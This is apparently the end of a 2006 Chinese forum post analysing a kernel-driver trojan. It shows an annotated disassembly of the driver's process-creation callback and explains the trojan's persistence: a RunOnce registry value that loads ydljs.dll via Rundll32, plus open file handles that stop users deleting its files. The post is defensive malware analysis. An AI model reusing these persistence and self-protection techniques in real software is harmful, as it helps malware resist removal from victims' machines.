.text:00010EBA                lea    eax, [ebp+var_10]
.text:00010EBD                push offset s_Explorer_exe ; "explorer.exe"
.text:00010EC2                push eax          ; char *
.text:00010EC3                call esi ; _stricmp  ; 判断进程名字是否是explorer.exe
.text:00010EC5                test eax, eax
.text:00010EC7                pop    ecx
.text:00010EC8                pop    ecx
.text:00010EC9                jnz    short loc_10EE8 ; 不是则跳走返回
.text:00010EC9
.text:00010ECB                push ebx          ; StartContext
.text:00010ECC                push offset StartRoutine ; StartRoutine
.text:00010ECC                                        ; 该函数用来打开驱动和dll文件
.text:00010ED1                push ebx          ; ClientId
.text:00010ED2                push ebx          ; ProcessHandle
.text:00010ED3                push ebx          ; ObjectAttributes
.text:00010ED4                push ebx          ; DesiredAccess
.text:00010ED5                lea    eax, [ebp+Handle]
.text:00010ED8                push eax          ; ThreadHandle
.text:00010ED9                call ds:PsCreateSystemThread
.text:00010EDF                push [ebp+Handle] ; Handle
.text:00010EE2                call ds:ZwClose    ; 关闭该线程
.text:00010EE2
.text:00010EE8
.text:00010EE8 loc_10EE8:                            ; CODE XREF: NotifyRoutine+C2j
.text:00010EE8                                        ; NotifyRoutine+D3j
.text:00010EE8                pop    edi
.text:00010EE9                pop    esi
.text:00010EE9
.text:00010EEA
.text:00010EEA loc_10EEA:                            ; CODE XREF: NotifyRoutine+Fj
.text:00010EEA                                        ; NotifyRoutine+19j
.text:00010EEA                                        ; NotifyRoutine+31j
.text:00010EEA                pop    ebx
.text:00010EEB                leave
.text:00010EEC                retn 0Ch
.text:00010EEC
.text:00010EEC NotifyRoutine endp
每当有新的进程创建，它就用前面计算出的EPROCESS.ImageFileName来定位进程名称，如果是
userinit.exe，则写注册
表"\registry\machine\software\microsoft\windows\currentversion\runonce"，键值为："%
systemroot%\system32\Rundll32.exe %systemroot%\system32\ydljs.dll,DllUnregisterServer"。如果
不是userinit.exe进程，继续判断是否是explorer.exe进程，是则打开driver和dll文件以保证他们不能
被用户删除。
--------------------------------------------------------------------------------
【总结】
      经过分析，此木马（恶意软件）共有2个文件：ydljs.dll和
esqyo.sys，用户不幸中招之后driver会写注册表注册驱动；注册开机运行ydljs.dll注入到Rundll32.exe
的键值；并且用driver打开sys文件和dll文件，保留句柄，使得用户无法卸载或删除相应的bin文件；每
次运行userinit.exe注册表以保证dll文件的开机加载。其他的破坏或者广告功能应该是在ydljs.dll中实
现的，driver只是用来保护文件、注册表中键值的安全。

--------------------------------------------------------------------------------
【致谢】
      感谢看雪论坛、一蓑烟雨和驱动开发网上各位大侠关于调试驱动的帮
助，这里一并谢过。
                                                   2006年12月28日 18:22  by prince
[ 本帖最后由 prince 于 2006-12-28 23:07 编辑 ]

返回列表回复发帖

[转帖]一个驱动木马的分析

[收藏此主题] [关注此主题的新回复]

[通过 QQ、MSN 分享给朋友]